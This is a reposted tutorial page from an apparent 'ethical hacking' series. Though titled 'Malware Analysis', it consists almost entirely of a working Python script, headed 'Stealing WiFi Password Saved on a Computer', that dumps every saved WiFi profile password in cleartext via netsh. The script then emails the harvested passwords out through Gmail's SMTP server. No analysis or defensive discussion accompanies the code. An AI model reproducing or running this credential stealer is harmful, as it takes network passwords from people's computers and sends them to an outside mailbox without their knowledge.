Python Ethical Hacking - Malware Analysis

Posted keepmoving1113

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Python Ethical Hacking - Malware Analysis相关的知识,希望对你有一定的参考价值。

Stealing WiFi Password Saved on a Computer

#!/usr/bin/env python

import smtplib
import subprocess
import re


def send_mail(email, password, message):
    server = smtplib.SMTP("smtp.gmail.com", 587)
    server.starttls()
    server.login(email, password)
    server.sendmail(email, email, message)
    server.quit()


command = "netsh wlan show profile"
networks = subprocess.check_output(command, shell=True)
network_names_list = re.findall("(?:Profile\\s*:\\s)(.*)", networks.decode())

result = ""
for network_name in network_names_list:
    command = "netsh wlan show profile \\"" + network_name + "\\" key=clear"
    current_result = subprocess.check_output(command, shell=True)
    result = result + current_result.decode()

print(result)

send_mail("aaaa@gmail.com", "1111111", result)

技术图片

 

以上是关于Python Ethical Hacking - Malware Analysis的主要内容,如果未能解决你的问题,请参考以下文章

Python Ethical Hacking - Malware Packaging

Python Ethical Hacking - Malware Packaging

Python Ethical Hacking - VULNERABILITY SCANNER

Python Ethical Hacking - VULNERABILITY SCANNER

Python Ethical Hacking - VULNERABILITY SCANNER

Python Ethical Hacking - VULNERABILITY SCANNER